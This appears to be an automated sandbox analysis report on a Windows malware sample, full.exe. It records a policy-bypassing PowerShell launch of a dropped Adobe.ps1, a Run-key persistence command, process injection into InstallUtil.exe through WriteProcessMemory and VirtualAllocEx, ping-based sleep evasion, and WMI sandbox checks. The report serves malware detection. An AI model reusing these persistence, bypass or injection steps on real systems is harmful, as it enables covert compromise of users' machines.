Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2077	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1403	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1089	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 356	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828	Thread sleep count: 2077 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5916	Thread sleep count: 1403 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4860	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4860	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3352	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000005.00000002.1736823660.0000020C23514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3712E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BhMHGFsXW
Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: JvMCI
Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tD8XLtpMI45nH9tjqVUERL4nRrHhFaxrTYpYpwo6j6BdmXQMmQmI/cEjEsR2qZrsh/+U9dlm/0szkh2pyFnjvwv+8G7uVfIBDMPFRKUpQOwCj2VmCi4w/snSSDftV86xjXzd14/9uhCdB2hHW7HRovsP7WNGM10ipZbU13545hz5/OJ/W
Source: powershell.exe, 00000005.00000002.1736823660.0000020C23514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3712E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BnoHGFsGKD4z
Source: full.exe, 00000000.00000002.2101713995.000001D5DB36C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Yt0xYqEQVvMCI
Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YTBytECSwLEQZvMCI
Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ZvMCI

Source: C:\Users\user\Desktop\full.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num10 + num16, array2, array2.Length, ref bytesWritten)
Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num8 + 8, ref buffer, 4, ref bytesWritten)
Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num9, length, 12288, 64)

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\full.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 720000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 722000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C1E008	Jump to behavior

Source: C:\Users\user\Desktop\full.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f	Jump to behavior
Source: C:\Users\user\Desktop\full.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
